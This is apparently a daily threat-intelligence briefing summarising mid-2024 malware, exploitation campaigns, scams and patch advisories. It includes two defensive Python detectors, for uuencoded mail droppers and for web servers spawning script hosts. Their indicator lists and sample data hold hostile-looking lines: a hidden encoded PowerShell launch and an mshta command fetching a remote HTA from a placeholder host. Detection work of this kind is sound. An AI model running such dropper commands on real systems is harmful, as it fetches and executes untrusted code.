
Cyware Daily Threat Intelligence


Daily Threat Briefing Jun 12, 2024

Imagine an email landing in your inbox that promises career advancement and a lucrative new role. That is the lure behind Warmcookie, a new Windows malware that gets into corporate networks through fake job offer phishing. Once running, it fingerprints the machine in detail, captures screenshots, and deploys additional payloads.

Microsoft's June Patch Tuesday addresses 49 vulnerabilities. The standout is a critical remote code execution flaw in MSMQ, joined by a publicly disclosed zero-day in DNSSEC validation.

The Smishing Triad has extended its operations to Pakistan. Its latest campaign targets mobile carrier customers with text messages that impersonate Pakistan Post, and the group registers local phone numbers and domain names so the lures blend in and are harder to block.

Top Malware Reported in the Last 24 Hours

Don’t be fooled by Warmcookie

A new Windows malware called Warmcookie is being distributed through fake job offer phishing campaigns to gain a foothold in corporate networks. The emails link to fake job platforms that redirect victims to malicious landing pages serving the payload. Once executed, the malware checks for analysis environments, establishes communication with a C2 server, fingerprints the machine, captures screenshots, executes commands, and deploys additional payloads.

Fake shipping lures drop Remcos RAT

Researchers spotted a new phishing campaign in which threat actors distribute Remcos RAT through UUEncoded file attachments in emails themed around importing or exporting shipments. The UUEncoded attachment decodes to an obfuscated VBS script, which in turn saves and executes a PowerShell script that downloads the Remcos RAT payload. The malware collects system information and keylogging data and sends it to a remote command-and-control server.
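As an added example (not code from the researchers' report or from the campaign), here is a small Python scanner that pulls uuencoded attachments out of a message body and flags the ones that decode to a script dropper. The mail text, attachment names, the inert VBS stub and the indicator lists are constructed for the example; only `binascii` is used, since the higher-level `uu` module was removed in Python 3.13.

```python
"""Added example: scan a mail body for uuencoded attachments and flag script
droppers, the delivery pattern described for the Remcos RAT campaign."""
import binascii
import re

# Start of a uuencode block: "begin <octal mode> <filename>".
BEGIN_RE = re.compile(r"^begin\s+[0-7]{3,4}\s+(.+)$")

# Illustrative lists (assumption, not campaign-specific indicators):
# extensions that execute as scripts on Windows, and strings typical of a
# VBS/PowerShell dropper.
SCRIPT_EXTENSIONS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd")
SUSPICIOUS_STRINGS = (b"WScript.Shell", b"powershell", b"-enc", b"FromBase64String", b"Execute(")


def extract_uu_blocks(text):
    """Yield (filename, decoded_bytes) for every begin/end block in text.
    Corrupt lines are skipped so one bad line does not hide the attachment."""
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = BEGIN_RE.match(lines[i].strip())
        if not m:
            i += 1
            continue
        name = m.group(1).strip()
        payload = bytearray()
        i += 1
        while i < len(lines) and lines[i].strip() != "end":
            line = lines[i]
            # Skip the zero-length terminator and blank lines: a2b_uu("")
            # would yield 32 NUL bytes instead of nothing.
            if line.strip() in ("", "`"):
                i += 1
                continue
            try:
                payload += binascii.a2b_uu(line)
            except binascii.Error:
                pass
            i += 1
        yield name, bytes(payload)
        i += 1


def scan_message(text):
    """Return [(filename, [reasons])] for attachments that look like droppers."""
    findings = []
    for name, data in extract_uu_blocks(text):
        reasons = []
        if name.lower().endswith(SCRIPT_EXTENSIONS):
            reasons.append("script extension: " + name)
        hits = [s.decode() for s in SUSPICIOUS_STRINGS if s.lower() in data.lower()]
        if hits:
            reasons.append("suspicious content: " + ", ".join(hits))
        if reasons:
            findings.append((name, reasons))
    return findings


def uuencode(name, data):
    """Build a uuencode block; used here only to construct the sample mail."""
    out = ["begin 644 " + name]
    for off in range(0, len(data), 45):
        out.append(binascii.b2a_uu(data[off:off + 45]).decode("ascii").rstrip("\n"))
    out += ["`", "end"]
    return "\n".join(out)


# Constructed sample: an inert VBS stub that would hand off to PowerShell
# ("SQBFAFgA" is just "IEX" in UTF-16LE base64), plus a benign text file.
SAMPLE_VBS = (
    b'Set sh = CreateObject("WScript.Shell")\r\n'
    b'sh.Run "powershell -nop -w hidden -enc SQBFAFgA", 0, False\r\n'
)
SAMPLE_EMAIL = "\n".join([
    "Subject: Export consignment documents",
    "",
    "Please find the bill of lading and shipping instructions attached.",
    "",
    uuencode("bill_of_lading.txt", b"Container BL no. 12345 (constructed, benign)\n"),
    "",
    uuencode("shipping_instructions.vbs", SAMPLE_VBS),
    "",
])

if __name__ == "__main__":
    for name, reasons in scan_message(SAMPLE_EMAIL):
        print(name, "->", "; ".join(reasons))
```

The decoder deliberately skips blank lines and the backtick terminator rather than feeding them to `binascii.a2b_uu`, which otherwise returns 32 NUL bytes for an empty line and silently pads the payload; mail gateways that decode uuencoded bodies need the same care.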

Top Vulnerabilities Reported in the Last 24 Hours

TellYouThePass abuses PHP bug

The TellYouThePass ransomware group began exploiting a critical flaw in PHP on Windows servers shortly after a proof-of-concept script was published. The attackers use the flaw to execute arbitrary code, upload webshells, and launch the ransomware through mshta.exe. The ransomware reports details of the infected machine to a command-and-control server and then drops a ransom note in the web directory.
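To make that chain visible on the host, here is an added example in Python (not code from the page's sources): a process-creation filter that alerts whenever a web-server process spawns a script host such as mshta.exe. The event lines, paths and the `example.invalid` host are constructed in a Sysmon Event ID 1 shape, and the process-name lists are assumptions to tune for your own stack.

```python
"""Added example: flag web-server processes that spawn script hosts, the
PHP-on-Windows -> webshell -> mshta.exe chain described for TellYouThePass.
Events are constructed in a Sysmon Event ID 1 (process create) shape."""
import json
import ntpath

# Assumption: parent images that should never launch script hosts on a web
# server; extend for your stack.
WEB_SERVER_IMAGES = {"php-cgi.exe", "php.exe", "httpd.exe", "w3wp.exe", "nginx.exe"}
# Living-off-the-land binaries a webshell typically reaches for.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "certutil.exe", "rundll32.exe"}


def detect(event_lines):
    """Return one alert dict per suspicious parent/child pair, in input order."""
    alerts = []
    for line in event_lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        child = ntpath.basename(ev.get("Image", "")).lower()
        if parent not in WEB_SERVER_IMAGES or child not in SCRIPT_HOSTS:
            continue
        cmd = ev.get("CommandLine", "")
        # A script host pulling remote content from under the web server is
        # the payload-delivery step; anything else is at least recon.
        remote = any(s in cmd.lower() for s in ("http://", "https://"))
        alerts.append({
            "time": ev.get("UtcTime"),
            "parent": parent,
            "child": child,
            "cmdline": cmd,
            "severity": "high" if remote else "medium",
        })
    return alerts


# Constructed events; the hostname uses the reserved .invalid TLD.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"UtcTime": "2024-06-11 02:14:03", "ParentImage": r"C:\php\php-cgi.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami", "User": r"NT AUTHORITY\IUSR"},
    {"UtcTime": "2024-06-11 02:14:09", "ParentImage": r"C:\php\php-cgi.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/u.hta", "User": r"NT AUTHORITY\IUSR"},
    {"UtcTime": "2024-06-11 08:30:41", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\admin\tool.hta", "User": r"CORP\admin"},
    {"UtcTime": "2024-06-11 08:31:02", "ParentImage": r"C:\Apache24\bin\httpd.exe",
     "Image": r"C:\php\php-cgi.exe",
     "CommandLine": "php-cgi.exe", "User": r"NT AUTHORITY\IUSR"},
    {"UtcTime": "2024-06-11 09:02:55", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc AAAA", "User": r"IIS APPPOOL\DefaultAppPool"},
])

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["severity"].upper(), a["time"], a["parent"], "->", a["child"], "|", a["cmdline"])
```

The rule keys on the parent/child pair rather than on mshta.exe alone, so an administrator opening an HTA from Explorer (third event) stays quiet while the same binary under php-cgi.exe fires; the PHP child of httpd.exe (fourth event) is normal CGI behaviour and is also ignored.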

Chinese Fortigate campaign

The Dutch NCSC warned that a Chinese cyber-espionage campaign, targeting vulnerable Fortigate network security appliances, is larger than initially known. Chinese hackers exploited a critical flaw in FortiOS/FortiProxy, breaching thousands of systems belonging to Western governments, international organizations, and defense contractors. The hackers deployed a previously unknown malware that can persist despite security upgrades, potentially allowing access to sensitive data. Organizations are urged to apply measures to limit the impact of successful digital attacks.

JetBrains warns of IntelliJ IDE flaw

JetBrains issued a warning about a critical vulnerability in its IntelliJ-based IDEs that could expose GitHub access tokens. The flaw, tracked as CVE-2024-37051, affects IntelliJ-based IDEs from version 2023.1 onwards when the JetBrains GitHub plugin is enabled. JetBrains has released security updates to fix the vulnerability and has removed the affected plugin versions from its marketplace. Users are urged to update their IDEs and to revoke any GitHub tokens that were used with the vulnerable plugin.

Top Scams Reported in the Last 24 Hours

Smishing Triad targets Pakistan

The Smishing Triad threat group has expanded its operations to Pakistan, targeting mobile carrier customers with fraudulent messages appearing to be from Pakistan Post. The messages prompt victims to provide personal and financial information under the guise of paying for a package. The group's activity involves using local phone numbers and domain names to evade detection. The National Cyber Emergency Response Team of Pakistan has issued a security advisory to citizens to protect themselves.

CISA Advisories

Microsoft June 2024 Patch Tuesday

Microsoft's June 2024 Patch Tuesday addressed 49 vulnerabilities, including a critical Microsoft Message Queuing (MSMQ) RCE flaw (CVE-2024-30080) with a CVSS score of 9.8 and a publicly disclosed zero-day in DNSSEC validation (CVE-2023-50868). The release also fixed a Windows Wi-Fi Driver vulnerability that allows remote code execution by an attacker within Wi-Fi range.

ICS security advisories

CISA released six ICS advisories on June 11 addressing vulnerabilities in Industrial Control Systems (ICS) products. The affected products include Rockwell Automation ControlLogix, GuardLogix, and CompactLogix; AVEVA PI Web API and PI Asset Framework Client; Intrado 911 Emergency Gateway; Schneider Electric APC Easy UPS Online Monitoring Software; and MicroDicom DICOM Viewer. CISA encourages users and administrators to review the advisories for technical details and mitigations.

Fortinet security update

Fortinet has released security updates for a FortiOS vulnerability that could allow a threat actor to take control of affected systems. The issue consists of multiple buffer overflows in the diag npu command. Users and administrators are encouraged to review the Fortinet Security Bulletin and apply the necessary updates.
